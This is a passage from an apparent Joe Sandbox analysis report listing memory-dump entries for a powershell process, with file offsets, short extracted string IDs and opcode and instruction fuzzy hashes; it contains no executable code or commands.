                                                                                                          • Source File: 0000000A.00000002.2789683657.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6930000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (fal$(fal$x.Rk$-Rk
                                                                                                          • API String ID: 0-3756857503
                                                                                                          • Opcode ID: 2a02e0e47a93b43473b065927e49579ac11626127a52fc03118db88d05e08fc9
                                                                                                          • Instruction ID: 2a31826289c930896c0968f5d09acc16d38df2ed71149ef008eba3e787606131
                                                                                                          • Opcode Fuzzy Hash: 2a02e0e47a93b43473b065927e49579ac11626127a52fc03118db88d05e08fc9
                                                                                                          • Instruction Fuzzy Hash: 53C18F74E002149FEB64DB58C450BAEB7B2BF88704F248569E4056BB44CB72AE42CF95
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: TQk$DUQk$XYal$XYal
                                                                                                          • API String ID: 0-2715195877
                                                                                                          • Opcode ID: c2431f93fad8be6054c778d70a0b337c9a84f65b83d99bfb0c45ca2f680ac9be
                                                                                                          • Instruction ID: 6422a84f8690912ac15dc81f2c83d7c230bd18da9b4b241673a6e9f5013d29c9
                                                                                                          • Opcode Fuzzy Hash: c2431f93fad8be6054c778d70a0b337c9a84f65b83d99bfb0c45ca2f680ac9be
                                                                                                          • Instruction Fuzzy Hash: FF910532F083458FEF55DB6C98046AAFBE6AFC6215B1480BBD506CB252DB31C941C7B2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 84_l$84_l$84_l$84_l
                                                                                                          • API String ID: 0-3874213435
                                                                                                          • Opcode ID: c73cf4427ba8d739266ac3158715ee507b39f9376cfcf2cb8ddb882269dc7fb2
                                                                                                          • Instruction ID: 2c0f04a6b7c246673d34b9a326eb0506e60a9c746c0ae8f4f9033ffb328c229f
                                                                                                          • Opcode Fuzzy Hash: c73cf4427ba8d739266ac3158715ee507b39f9376cfcf2cb8ddb882269dc7fb2
                                                                                                          • Instruction Fuzzy Hash: 40A19131F00205DFFF68DEA8D844B6AB7A6AF88715F158466E805AB390CB71DD41CBB1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (fal$(fal$(fal$(fal
                                                                                                          • API String ID: 0-3548537966
                                                                                                          • Opcode ID: cc67880d2bb97da310722d72f88f2362775a6e35fb5277af757b1540df216005
                                                                                                          • Instruction ID: cba7be00d90ca5df725dcea8790b7c915f2343206261220153421f59ac2060c6
                                                                                                          • Opcode Fuzzy Hash: cc67880d2bb97da310722d72f88f2362775a6e35fb5277af757b1540df216005
                                                                                                          • Instruction Fuzzy Hash: BEA1BD75E04600CFEF60CF58C441A6AB7B6BF89710F19C42DD8266B644D7B2E882CFA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2795123686.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f90000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (fal$(fal$(fal$(fal
                                                                                                          • API String ID: 0-3548537966
                                                                                                          • Opcode ID: 51fe237f950b4dd68aad39431eac06274ba61781bc688685c4a4daae1ac62f9f
                                                                                                          • Instruction ID: 3846cd72cf95a95c1933eb8b702a4f60b6cc7017830c602573002682c1831a06
                                                                                                          • Opcode Fuzzy Hash: 51fe237f950b4dd68aad39431eac06274ba61781bc688685c4a4daae1ac62f9f
                                                                                                          • Instruction Fuzzy Hash: A1718E74E00209DFEB54DF58C890A6EB7F2AF88211F19816ED805AB751CBB2DD41CFA5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2789683657.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6930000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (fal$(fal$4^l$tLSk
                                                                                                          • API String ID: 0-2993168839
                                                                                                          • Opcode ID: 94796c7140a94b2edc64857d669eeb3d230dc4fb6818295d201b5c0e108d43cf
                                                                                                          • Instruction ID: 17dbbb6ba40af06fc7c915b8098fab6069a426c417c6380eafec8b1fd2e2e12e
                                                                                                          • Opcode Fuzzy Hash: 94796c7140a94b2edc64857d669eeb3d230dc4fb6818295d201b5c0e108d43cf
                                                                                                          • Instruction Fuzzy Hash: 4761AF34E04214DFD764CF58C940AAAB7E6EF84724F24846AE405ABB55CB72ED42CB91